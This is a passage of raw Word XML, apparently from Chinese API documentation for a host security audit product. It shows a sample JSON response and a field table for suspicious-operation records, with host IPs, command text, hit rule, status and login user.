      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hitRuleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.109",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auditStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258E953"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885"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4331"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0089272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7FBDAE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2409FA9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DDFDD9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00456039" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A4AB6C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B0B33B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD8A408" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B198B8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0B15A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77D124FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F52EDF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B7F4E35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE8134D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B397F30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="585228D1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D84BB81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="581A0354" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FE8195" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56BE29B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47C59CB3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F4B8A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="615C0F78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CA48A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22523B9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1903DE95" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03194E61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE0A06C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5077507D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C57A28E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21FB25F0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447EA80F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A022E8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C0AEAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF988A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2672C5FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AEB2A6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AC760F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DDF43CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79394E03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="327D9ACC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2299B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766EA470" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA7630A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698F1DF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A6F4BF6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A84693" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA82D4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27DEA9C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24242A16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19EC4801" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC1D829" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>logTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="398E74C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29231F55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4375D153" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66BEB9EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18930297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AD7257C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC5DC98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AC5ED3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作内容（带tag）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3210DF69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DEF2A1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmdNoHightLight</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2F67CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04AD6E47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C6C4E9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作内容（不带tag）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="297D26C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C579B15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hitRuleName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E54999" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12454BAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0774DE34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命中规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F980509" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4144F7AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDEBD2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350C67ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FBBD40" w14:textId="5D3964CD" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑操作类型，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "可疑操作类型" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>可疑操作类型</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ABA6F75" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1605FA5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E62C8A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB8AD13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD475DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="526B8F70" w14:textId="77777777" w:rsidTr="005C4BFD">
